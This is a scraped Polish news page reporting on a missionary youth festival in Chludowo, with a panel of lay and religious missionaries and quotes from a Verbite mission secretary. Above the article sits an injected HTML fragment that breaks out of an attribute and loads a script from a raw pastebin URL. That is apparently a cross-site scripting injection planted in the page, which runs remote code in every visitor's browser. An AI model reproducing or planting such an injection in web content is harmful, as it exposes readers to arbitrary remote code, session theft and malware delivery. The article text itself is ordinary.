">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

Chludowo: młodzi spotkali się z misjonarzami  

Od 3 do 7 lipca w Chludowie k. Poznania trwa V Misyjne Święto Młodych, zorganizowane przez Werbistowskie Centrum Młodych TABOR. W spotkaniu bierze udział prawie 200 młodych ludzi z całej Polski.

Wczoraj, 5 lipca, odbył się misyjny panel dyskusyjny, w którym wzięli udział misjonarze świeccy i zakonni. Swoim doświadczeniem podzielili się m.in

s. Zyta Konkol ze Zgromadzenia Misyjnego Służebnic Ducha Świętego, która 30 lat pracowała na misjach w Papui Nowej Gwinei, werbista o. Andrzej Dzida, misjonarz z Madagaskaru oraz misjonarka świecka Alicja Kajak-Zięba, posługująca przez 10 lat w kameruńskim buszu wśród Pigmejów jako pielęgniarka i katechistka. Z kolei o tym, co robią dla misji mieszkając i pracując w Polsce, opowiadali m.in. Tomasz Kiesling z diakonii misyjnej Ruchu Światło-Życie i ks. dr Szymon Stułkowski, opiekun naukowy Akademickiego Koła Misjologicznego działającego przy Wydziale Teologicznym Uniwersytetu im. Adama Mickiewicza w Poznaniu, jednego z dwóch tego typu kół istniejących w Polsce.

Misyjny panel dyskusyjny, jak wyjaśnia w rozmowie z KAI o Andrzej Danielewicz, sekretarz ds. misji polskiej prowincji zgromadzenia werbistów, przygotowany został z myślą o tym, aby młodzi ludzie zobaczyli, jak wiele jest możliwości wspierania misji czy bycia misjonarzem, nie tylko wyjeżdżając na misje, ale również pozostając w kraju. „Misjonarzem nie jest tylko ten, kto bezpośrednio głosi Dobrą Nowinę ludziom, którzy nie słyszeli jeszcze o Chrystusie, ale każdy, kto dzieli się swoją wiarą z innymi. Na tym przecież polega misyjność Kościoła. Do tego potrzeba jednak dobrej woli, kreatywności i szeroko otwartych oczu, żeby dostrzec potrzeby innych, a jednocześnie zobaczyć, co ja mogę z siebie dać i w jaki sposób zaangażować się w dzieło misyjne Kościoła” – podsumowuje o. Danielewicz.

bt / Chludowo